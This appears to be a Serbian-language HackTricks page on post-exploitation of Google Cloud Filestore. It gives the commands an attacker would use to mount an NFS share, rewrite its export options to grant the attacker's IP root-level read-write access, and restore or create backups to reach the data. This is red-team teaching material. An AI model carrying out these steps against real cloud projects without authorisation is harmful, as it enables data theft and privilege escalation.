GCP - Filestore Post Exploitation

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Filestore

Za više informacija o Filestore-u pogledajte:

GCP - Filestore Enum

Montiranje Filestore-a

Deljeni fajl sistem može sadržati osetljive informacije koje su interesantne sa perspektive napadača. Sa pristupom Filestore-u je moguće ga montirati:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Da biste pronašli IP adresu instance Filestore, proverite odeljak za enumeraciju na stranici:

GCP - Filestore Enum

Uklonite ograničenja i dobijte dodatne dozvole

Ako napadač nema IP adresu sa pristupom deljenju, ali ima dovoljno dozvola da je izmeni, moguće je ukloniti ograničenja ili pristupiti deljenju. Takođe je moguće dodeliti više privilegija vašoj IP adresi kako biste imali administratorski pristup deljenju:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Obnova rezervne kopije

Ako postoji rezervna kopija, moguće je je obnoviti na postojećem ili novom instanci kako bi njegove informacije postale dostupne:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Napravite rezervnu kopiju i vratite je

Ako nemate pristup deljenju i ne želite da ga menjate, moguće je napraviti rezervnu kopiju i vratiti je kao što je prethodno pomenuto:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated